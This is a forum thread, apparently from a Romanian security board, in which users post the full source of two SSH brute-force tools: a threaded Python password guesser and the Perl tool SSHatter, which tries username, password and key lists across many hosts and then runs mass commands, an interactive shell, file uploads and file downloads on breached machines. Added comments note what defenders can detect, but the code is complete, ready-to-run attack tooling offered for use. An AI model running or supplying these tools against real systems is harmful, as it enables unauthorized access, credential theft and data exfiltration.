Nytro

Brute SSH


Posted

E luat de pe Backtrack.

#!/usr/bin/python
import thread
import time
from threading import Thread
import sys, os,threading, time, traceback, getopt
import paramiko
import terminal

# Shared module-level state for the worker threads and the driver functions.
global adx
global port

# adx is the stop flag: a worker only tries a login while it equals "1" and
# sets it to "0" once a password has been accepted.
adx="1"
# NOTE(review): port is assigned but not referenced anywhere in this listing.
port=22
# NOTE(review): data is likewise never used in the code shown.
data=[]
# i is used as a one-element mutable counter: i[0] is the number of workers in flight.
i=[]

term = terminal.TerminalController()
# paramiko's internal log is written to demo.log in the current working directory.
paramiko.util.log_to_file('demo.log')

# Start-up banner.
print "\n*************************************"
print "*"+term.RED + "SSH Bruteforcer Ver. 0.2"+term.NORMAL+" *"
print "*Coded by Christian Martorella *"
print "*Edge-Security Research *"
print "*laramies@gmail.com *"
print "*************************************\n"

# Print the command-line help and terminate the process via sys.exit().
# NOTE(review): indentation was lost when this listing was pasted; the lines
# below are the function body.
def usage():
print "Usage: brutessh.py options \n"
print " -h: destination host\n"
print " -u: username to force\n"
print " -d: password file \n"
print " -t: threads (default 12, more could be bad)\n\n"
print "Example: brutessh.py -h 192.168.1.55 -u root -d mypasswordlist.txt \n"
sys.exit()

# Worker thread that tries exactly one candidate password against the target.
# NOTE(review): indentation was lost when this listing was pasted, so the
# nesting of the statements below cannot be confirmed from the text.
#
# Defender note: each worker opens its own connection, makes a single password
# attempt and disconnects, so the server side sees one connection and at most
# one failed password login per candidate, all for the same username.
# Per-source limits on connections and failed logins, and key-only
# authentication, are the controls that apply to this pattern.
class force(Thread):
# name carries the raw line read from the password file.
def __init__( self, name ):
Thread.__init__(self)
self.name = name

def run(self):
global adx
# Skip the attempt once another worker has already reported success.
if adx == "1":
# Keep only the text before the first newline of the candidate line.
passw=self.name.split("\n")[0]
# hostname and username are module globals assigned in test().
t = paramiko.Transport(hostname)
try:
t.start_client()
except Exception:
# Any exception from the connection setup is swallowed.
x = 0

try:
t.auth_password(username=username,password=passw)
except Exception:
# Any exception from the attempt is swallowed; the outcome is read from
# is_authenticated() below.
x = 0

if t.is_authenticated():
# The accepted password is printed in cleartext on the terminal.
print term.DOWN + term.GREEN + "\nAuth OK ---> Password Found: " + passw + term.DOWN + term.NORMAL
t.close()
# Tell the remaining workers to stop trying.
adx = "0"
else:
# Overwrite the previous status line with the candidate that just failed.
print term.BOL + term.UP + term.CLEAR_EOL + passw + term.NORMAL
t.close()
time.sleep(0)
# Release this worker's slot in the in-flight counter.
i[0]=i[0]-1


# Driver loop: starts one force thread per candidate line while fewer than th
# workers are counted in i[0]. names is consumed from the front as it goes.
# NOTE(review): indentation was lost in this paste, so the exact nesting of the
# statements (in particular where thread.join() sits) cannot be confirmed.
def test_thread(names):
i.append(0)
j=0
while len(names):
try:
# th is the module global assigned in test().
if i[0]<th:
n = names.pop(0)
i[0]=i[0]+1
# This local name shadows the imported thread module inside the function.
thread=force(n)
thread.start()
# j counts the threads started; it is not read again in this listing.
j=j+1
except KeyboardInterrupt:
print "Attack suspended by user..\n"
sys.exit()
thread.join()

# Entry routine: parses the options, loads the password file and runs
# test_thread() over its lines, then prints the start and end clock values.
# argv is the argument list without the program name.
# NOTE(review): indentation was lost in this paste; nesting is not recoverable
# from the text alone.
def test(argv):
# th, hostname and username are published as module globals because the
# force workers and test_thread() read them directly.
global th
global hostname
global username
th = 12
if len(sys.argv) < 3:
usage()
try :
opts, args = getopt.getopt(argv,"h:u:d:t:")
except getopt.GetoptError:
usage()
for opt,arg in opts :
if opt == '-u':
username = arg
elif opt == '-h':
hostname =arg
elif opt == '-d':
# password holds the path of the word list, not a password.
password = arg
elif opt == "-t":
th = arg
try:
f = open(password, "r")
except:
print "Can't open password file\n"
sys.exit()
print term.RED + "HOST: " +term.NORMAL + hostname + term.RED + " Username: " +term.NORMAL + username +term.RED + " Password file: " +term.NORMAL+ password
print "==========================================================================="
print "Trying password...\n"
# The whole word list is read into memory; each entry keeps its trailing newline.
name = f.readlines()
starttime = time.clock()
test_thread(name)
stoptime = time.clock()
print "\nTimes -- > Init: "+ str(starttime) + " End: "+str(stoptime)
print "\n"

# Script entry point: run test() on the command-line arguments and exit
# quietly when the operator presses Ctrl-C.
if __name__ == "__main__":
try:
test(sys.argv[1:])
except KeyboardInterrupt:
print "Attack suspended by user...\n"
sys.exit()

Va descurcati. Daca nu sunteti in stare sa il folositi nici pe asta, lasati-va de astfel de prostii. (@ "hackerii de carton")

Posted

#!/usr/bin/perl -w
# $Header: /var/lib/cvsd/var/lib/cvsd/SSHatter/src/SSHatter.pl,v 1.12 2009-12-10 01:25:47 timb Exp $
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the Nth Dimension nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (c) Tim Brown, 2009
# <mailto:timb@nth-dimension.org.uk>
# <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>

use strict;

package SSHatter::SSH::Host;

use Net::SSH::Perl;

# Constructor: create a host object that records the target's hostname and
# port number. Arguments after the class name: hostname, port number.
sub new {
    my ($class, $hostname, $portnumber) = @_;
    my $self = bless({}, $class);
    $self->{'hostname'} = $hostname;
    $self->{'portnumber'} = $portnumber;
    return $self;
}

# Return the target as a "hostname:port" label, used in log lines and in the
# names of downloaded files.
sub info {
    my ($self) = @_;
    my $label = $self->{'hostname'} . ":" . $self->{'portnumber'};
    return $label;
}

# Create an OS pipe and keep both ends on the object as 'readhandle' and
# 'writehandle'. The call inside is Perl's builtin pipe().
sub pipe {
    my ($self) = @_;
    pipe($self->{'readhandle'}, $self->{'writehandle'});
}

# Test whether a private key is accepted for a username on this host.
# Arguments: username, path of the identity (private key) file.
# Returns 1 when login and the probe command raise no error, 0 when the error
# text contains "Permission denied"; dies with an exception-name string for
# any other failure.
sub checkbykey {
my $self;
my $username;
my $key;
my $sshhandle;
$self = shift;
$username = shift;
$key = shift;
eval {
# A new connection object is built for every check; password authentication
# is switched off through the options list.
$sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$key], options => ["PasswordAuthentication no"]);
};
if ($@ ne "") {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
} else {
eval {
$sshhandle->login($username);
# Defender note: the probe is the literal command "echo SSHatter", so an
# accepted credential leaves that string in any command/exec audit trail
# the target keeps.
$sshhandle->cmd("echo SSHatter");
};
if ($@ ne "") {
# Only a "Permission denied" error counts as a rejected credential.
if ($@ !~ /Permission denied/) {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
} else {
return 0;
}
}
}
return 1;
}

# Test whether a password is accepted for a username on this host.
# Arguments: username, candidate password.
# Returns 1 when login and the probe command raise no error, 0 when the error
# text contains "Permission denied"; dies with an exception-name string for
# any other failure.
#
# Defender note: every call builds a new connection and makes one login
# attempt, so failed-login counters and per-source connection limits on the
# server are what this routine runs into; accounts without password
# authentication are not reachable through it.
sub checkbypassword {
my $self;
my $username;
my $password;
my $sshhandle;
$self = shift;
$username = shift;
$password = shift;
eval {
$sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'});
};
if ($@ ne "") {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
} else {
eval {
$sshhandle->login($username, $password);
# The probe is the literal command "echo SSHatter"; it shows up in
# command/exec audit records where the target keeps them.
$sshhandle->cmd("echo SSHatter");
};
if ($@ ne "") {
# Only a "Permission denied" error counts as a rejected credential.
if ($@ !~ /Permission denied/) {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
} else {
return 0;
}
}
}
return 1;
}

# Accessor for the write end of the pipe stored on the object.
sub writehandle {
    my ($self) = @_;
    return $self->{'writehandle'};
}

# Accessor for the read end of the pipe stored on the object.
sub readhandle {
    my ($self) = @_;
    return $self->{'readhandle'};
}

# Close the write end of the pipe held on the object; the read end stays open.
sub unpipe {
    my ($self) = @_;
    close($self->{'writehandle'});
}

# Record the key file that was accepted for a username on this host.
# Arguments: username, key file path. A later entry for the same username
# replaces the earlier one.
sub addkey {
    my ($self, $username, $key) = @_;
    $self->{'keys'}{$username} = $key;
}

# Record the password that was accepted for a username on this host.
# Arguments: username, password. The value is kept in cleartext on the object;
# a later entry for the same username replaces the earlier one.
sub addpassword {
    my ($self, $username, $password) = @_;
    $self->{'passwords'}{$username} = $password;
}

# List the usernames for which a key has been recorded on this host.
sub usernamesbykey {
    my ($self) = @_;
    my @usernames = keys(%{$self->{'keys'}});
    return @usernames;
}

# List the usernames for which a password has been recorded on this host.
sub usernamesbypassword {
    my ($self) = @_;
    my @usernames = keys(%{$self->{'passwords'}});
    return @usernames;
}

# Look up the key file recorded for a username (undef when none is stored).
sub key {
    my ($self, $username) = @_;
    return $self->{'keys'}{$username};
}

# Look up the password recorded for a username (undef when none is stored).
sub password {
    my ($self, $username) = @_;
    return $self->{'passwords'}{$username};
}

# Run a command on this host as a user whose key was recorded earlier.
# Arguments: username, command string.
# Returns the list produced by cmd(); returns ("", "", -42) when the error text
# contains "Permission denied" (callers test element 2 against -42); dies with
# an exception-name string for any other failure.
sub executebykey {
my $self;
my $username;
my $commandstring;
my $sshhandle;
my @resultstrings;
$self = shift;
$username = shift;
$commandstring = shift;
eval {
# A new connection is opened for every command, using the stored key file
# with password authentication switched off through the options list.
$sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$self->{'keys'}{$username}], options => ["PasswordAuthentication no"]);
};
if ($@ ne "") {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
} else {
eval {
# Echo a prompt-like line (user, key path, host:port, command) to STDOUT
# before logging in.
print "[" . $username . ":" . $self->{'keys'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n";
$sshhandle->login($username);
@resultstrings = $sshhandle->cmd($commandstring);
};
if ($@ ne "") {
if ($@ !~ /Permission denied/) {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
} else {
# -42 in the third slot is the "credential no longer accepted" sentinel.
return ("", "", -42);
}
}
}
return @resultstrings;
}

# Run a command on this host as a user whose password was recorded earlier.
# Arguments: username, sudo flag, command string.
# Returns the list produced by cmd(); returns ("", "", -42) when the error text
# contains "Permission denied" (callers test element 2 against -42); dies with
# an exception-name string for any other failure.
sub executebypassword {
my $self;
my $username;
my $sudoflag;
my $commandstring;
my $sshhandle;
my @resultstrings;
$self = shift;
$username = shift;
$sudoflag = shift;
$commandstring = shift;
eval {
$sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'});
};
if ($@ ne "") {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
} else {
eval {
$sshhandle->login($username, $self->{'passwords'}{$username});
# The prompt-like line written to STDOUT includes the password in cleartext,
# so anything that captures this output ends up holding credentials.
print "[" . $username . ":" . $self->{'passwords'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n";
# The test is defined(), not truthiness: any defined flag value, 0 included,
# selects the branch that passes the password plus a newline as the second
# argument of cmd() (the help text describes this as echoing it to STDIN).
if (defined($sudoflag)) {
@resultstrings = $sshhandle->cmd($commandstring, $self->{'passwords'}{$username} . "\n");
} else {
@resultstrings = $sshhandle->cmd($commandstring);
}
};
if ($@ ne "") {
if ($@ !~ /Permission denied/) {
die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
} else {
# -42 in the third slot is the "credential no longer accepted" sentinel.
return ("", "", -42);
}
}
}
return @resultstrings;
}

package SSHatter;

use File::Basename;
use Getopt::Std;
use Parallel::ForkManager;

# File-scoped lexicals used by the top-level script that follows: parsed
# options, file handles, per-target state and scratch buffers.
my %argumentslist;
my $maximumprocess;
my $targetserverfilename;
my $usernamefilename;
my $keydirectoryname;
my $passwordfilename;
my $dumbflag;
my $sudoflag;
my $safeflag;
my $masscommand;
my $interactiveflag;
my $localfilename;
my $remotefilename;
my $targetserverhandle;
my $targetserverstring;
my $hostname;
my $portnumber;
my $forkmanager;
my $targetserver;
my $processid;
my $writehandle;
my $usernamehandle;
my $usernamestring;
my $keyfilename;
my $passwordhandle;
my $passwordstring;
# One SSHatter::SSH::Host object per line of the target file.
my @targetservers;
my $username;
my $confirmresponse;
my @resultstrings;
my $nextcommand;
my $localfilehandle;
my $localfilebyte;
# Upload payload, built up as a string of \xNN escapes.
my $localfiledata;

# Split one line of the target file into (hostname, port).
# Line feeds are removed first. The port is the first run of digits after the
# colon; a missing, zero, non-numeric or out-of-range (above 65535) port falls
# back to 22.
sub parsetarget {
    my ($targetserverstring) = @_;
    $targetserverstring =~ tr/\x0a//d;
    my ($hostname, $portnumber) = split(/:/, $targetserverstring);
    if ($portnumber && ($portnumber =~ /([0-9]+)/)) {
        $portnumber = $1;
        unless (($portnumber > 0) && ($portnumber <= 65535)) {
            $portnumber = 22;
        }
    } else {
        $portnumber = 22;
    }
    return ($hostname, $portnumber);
}

# Help hook in package main (reached through the Getopt::Std::help_mess calls
# in the option handling of this script): terminates the program with the
# usage text via die.
sub main::HELP_MESSAGE {
die "usage: " . basename($0) . " -x <maximumprocess> -t <targetserverfilename> -u <usernamefilename> <[-k <keydirectoryname>] [-p <passwordfilename>] [-d]> [[-0] [-s] -m <masscommand> | [-0] [-s] -i | -P <localfilename> | -G <remotefilename>]

-d - dumb mode, try username equals password, username, blank
-0 - sudo mode, echo the password to STDIN (useful for systems where sudo -S works)
-s - safe mode, prompt before executing
-m - mass mode, run one command across all targets
-i - interactive mode, run multiple commands across all targets (non-persistant)
-P - upload a file
-G - download a file

If sudo mode is not enabled, then " . $0 . " will block on STDIN.";
}

# Version hook in package main: prints the program's base name followed by
# the version string.
sub main::VERSION_MESSAGE {
    my $programname = basename($0);
    print $programname . " 1.0\n";
}

# Option handling. -x, -t and -u are mandatory, and at least one of -k, -p or
# -d must be given; otherwise the usage text is shown through help_mess().
$Getopt::Std::STANDARD_HELP_VERSION = 1;
getopts("x:t:u:k:p:d0sm:iP:G:", \%argumentslist);
# -x: maximum number of parallel child processes (first run of digits in the value).
if (defined($argumentslist{'x'}) && ($argumentslist{'x'} =~ /([0-9]+)/)) {
$maximumprocess = $1;
} else {
Getopt::Std::help_mess("", "main");
}
# -t: file of targets, one "host[:port]" per line; must exist.
if (defined($argumentslist{'t'}) && (-e $argumentslist{'t'})) {
$targetserverfilename = $argumentslist{'t'};
} else {
Getopt::Std::help_mess("", "main");
}
# -u: file of usernames, one per line; must exist.
if (defined($argumentslist{'u'}) && (-e $argumentslist{'u'})) {
$usernamefilename = $argumentslist{'u'};
} else {
Getopt::Std::help_mess("", "main");
}
# -k: directory of private key files (ignored when the path does not exist).
if (defined($argumentslist{'k'}) && (-e $argumentslist{'k'})) {
$keydirectoryname = $argumentslist{'k'};
}
# -p: password list file (ignored when the path does not exist).
if (defined($argumentslist{'p'}) && (-e $argumentslist{'p'})) {
$passwordfilename = $argumentslist{'p'};
}
# -d: "dumb" mode, a fixed set of trivial passwords per username.
if (defined($argumentslist{'d'})) {
$dumbflag = 1;
}
if (!defined($keydirectoryname) && !defined($passwordfilename) && !defined($dumbflag)) {
Getopt::Std::help_mess("", "main");
}
# -0: sudo mode; -s: ask for confirmation before executing commands.
if (defined($argumentslist{'0'})) {
$sudoflag = 1;
}
if (defined($argumentslist{'s'})) {
$safeflag = 1;
}
# The post-check action is chosen by precedence: -m, then -i, then -P, then -G.
if (defined($argumentslist{'m'})) {
$masscommand = $argumentslist{'m'};
} else {
if (defined($argumentslist{'i'})) {
$interactiveflag = 1;
} else {
if (defined($argumentslist{'P'})) {
if (-e $argumentslist{'P'}) {
$localfilename = $argumentslist{'P'};
} else {
Getopt::Std::help_mess("", "main");
}
} else {
if (defined($argumentslist{'G'})) {
$remotefilename = $argumentslist{'G'};
}
}
}
}

# Process pool limited to $maximumprocess children. The callback below runs in
# the parent each time a child ends and collects what that child reported.
$forkmanager = Parallel::ForkManager->new($maximumprocess);
$forkmanager->run_on_finish(sub {
my $processid;
my $returncode;
my $targetserver;
my $readhandle;
my $readdata;
my $credentialtype;
my $username;
my $credentialstring;
# Callback arguments, in order: child pid, exit code, and the host object
# that was passed to start().
$processid = shift;
$returncode = shift;
$targetserver = shift;
# Close the parent's copy of the write end, then read the pipe to the end.
$targetserver->unpipe();
$readhandle = $targetserver->readhandle();
while ($readdata = <$readhandle>) {
$readdata =~ s/\x0a//g;
# Each record is "TYPE USERNAME CREDENTIAL" separated by single spaces;
# TYPE "K" means a key file path, anything else is stored as a password.
($credentialtype, $username, $credentialstring) = split(/ /, $readdata);
if ($credentialtype eq "K") {
$targetserver->addkey($username, $credentialstring);
} else {
$targetserver->addpassword($username, $credentialstring);
}
}
close($readhandle);
print STDERR "I: " . $targetserver->info() . " finished\n";
});
# Credential check phase: one child process per target line. Inside the child,
# every username is tried with every key file, every listed password and,
# in dumb mode, three fixed passwords. Accepted credentials are written to the
# target's pipe for the parent to collect.
#
# Defender note: on the receiving side this is a burst of separate connections
# from one source, each making a single login attempt across many usernames.
# The dumb-mode list names the account states worth auditing for: a blank
# password, the literal "password", and a password equal to the username.
open($targetserverhandle, "<" . $targetserverfilename);
while ($targetserverstring = <$targetserverhandle>) {
($hostname, $portnumber) = parsetarget($targetserverstring);
$targetserver = SSHatter::SSH::Host->new($hostname, $portnumber);
print STDERR "I: " . $targetserver->info() . "\n";
push(@targetservers, $targetserver);
# The pipe is created before the fork so parent and child share it.
$targetserver->pipe();
# In the parent start() returns a true value and the loop moves on to the
# next target; the code below this line runs in the child.
$processid = $forkmanager->start($targetserver) and next;
$writehandle = $targetserver->writehandle();
open($usernamehandle, "<" . $usernamefilename);
while ($usernamestring = <$usernamehandle>) {
$usernamestring =~ s/\x0a//g;
if (defined($keydirectoryname)) {
# Every file in the key directory is offered as an identity file.
while ($keyfilename = <$keydirectoryname/*>) {
if ($targetserver->checkbykey($usernamestring, $keyfilename) == 1) {
print $writehandle "K" . " " . $usernamestring . " " . $keyfilename . "\n";
}
}
}
if (defined($passwordfilename)) {
# The password list is reopened and read in full for each username.
open($passwordhandle, "<" . $passwordfilename);
while ($passwordstring = <$passwordhandle>) {
$passwordstring =~ s/\x0a//g;
if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) {
print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n";
}
}
close($passwordhandle);
}
if (defined($dumbflag)) {
# Dumb mode: blank password, the word "password", and the username itself.
foreach $passwordstring (("", "password", $usernamestring)) {
if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) {
print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n";
}
}
}
}
close($usernamehandle);
# End of the child's work for this target.
$forkmanager->finish();
}
close($targetserverhandle);
$forkmanager->wait_all_children();
# Report phase: print every recorded credential to STDOUT as
# "username:keypath@host:port" or "username:password@host:port".
# Passwords appear in cleartext, so this output is itself sensitive material
# wherever it is stored or logged.
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
print $username . ":" . $targetserver->key($username) . "@" . $targetserver->info() . "\n";
}
foreach $username ($targetserver->usernamesbypassword()) {
print $username . ":" . $targetserver->password($username) . "@" . $targetserver->info() . "\n";
}
}
# Safe mode (-s): before mass or interactive execution, ask for confirmation
# and exit with status 1 unless the answer starts with "y" or "Y".
# Upload (-P) and download (-G) are not covered by this prompt.
if ((defined($masscommand) || defined($interactiveflag)) && defined($safeflag)) {
print "W: executing " . (defined($masscommand) ? $masscommand : "in interactive mode") . ", continue? [y/N] ";
$confirmresponse = <>;
if ($confirmresponse !~ /^[Yy]/) {
exit(1);
}
}
# Action phase. Exactly one of four modes runs, in this order of precedence:
# mass command, interactive shell, upload, download. Each mode loops over every
# target and every recorded username, first those with keys, then those with
# passwords, and opens a new connection per command. A result whose third
# element is -42 (credential rejected) is skipped.
#
# Defender note: on a target, an upload shows up as a shell command made of
# printf with a long run of \xNN escapes appended (>>) to a file in the
# session's working directory, and a download as a plain cat of the requested
# path; both are visible to command/exec auditing where it is enabled.
if (defined($masscommand)) {
# Mass mode: the same command on every target and account.
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, $masscommand);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, $sudoflag, $masscommand);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
}
} else {
if (defined($interactiveflag)) {
# Interactive mode: read commands from input until "exit". "put <file>" and
# "get <file>" are handled locally; anything else is sent as typed.
print "\$ ";
while ($nextcommand = <>) {
$nextcommand =~ s/\x0a//g;
if ($nextcommand eq "exit") {
last;
} else {
if ($nextcommand =~ /put (.*)/) {
# Read the local file byte by byte and append each byte to
# $localfiledata as a \xNN escape.
open($localfilehandle, "<" . $1);
binmode($localfilehandle);
while (read($localfilehandle, $localfilebyte, 1) != 0) {
$localfiledata .= sprintf("\\x%02x", ord($localfilebyte));
}
close($localfilehandle);
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($1));
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($1));
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
}
} else {
if ($nextcommand =~ /get (.*)/) {
# The remote file is read with cat and saved locally as
# "<username>@<host:port>-<basename>".
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, "cat " . $1);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1));
print $localfilehandle $resultstrings[0];
close($localfilehandle);
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, 0, "cat " . $1);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1));
print $localfilehandle $resultstrings[0];
close($localfilehandle);
}
}
}
} else {
# Any other input line is executed as a command.
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, $nextcommand);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, $sudoflag, $nextcommand);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
}
}
}
}
print "\$ ";
}
} else {
if (defined($localfilename)) {
# Upload mode (-P): same encoding and delivery as the interactive "put".
open($localfilehandle, "<" . $localfilename);
binmode($localfilehandle);
while (read($localfilehandle, $localfilebyte, 1) != 0) {
$localfiledata .= sprintf("\\x%02x", ord($localfilebyte));
}
close($localfilehandle);
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($localfilename));
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($localfilename));
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
print $resultstrings[0];
}
}
}
} else {
if (defined($remotefilename)) {
# Download mode (-G): same retrieval and local naming as the interactive "get".
foreach $targetserver (@targetservers) {
foreach $username ($targetserver->usernamesbykey()) {
@resultstrings = $targetserver->executebykey($username, "cat " . $remotefilename);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename));
print $localfilehandle $resultstrings[0];
close($localfilehandle);
}
}
foreach $username ($targetserver->usernamesbypassword()) {
@resultstrings = $targetserver->executebypassword($username, 0, "cat " . $remotefilename);
if (($resultstrings[2] != -42) && defined($resultstrings[0])) {
open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename));
print $localfilehandle $resultstrings[0];
close($localfilehandle);
}
}
}
}
}
}
}
# The script always ends with exit status 1, whichever mode ran.
exit(1);

sshatter
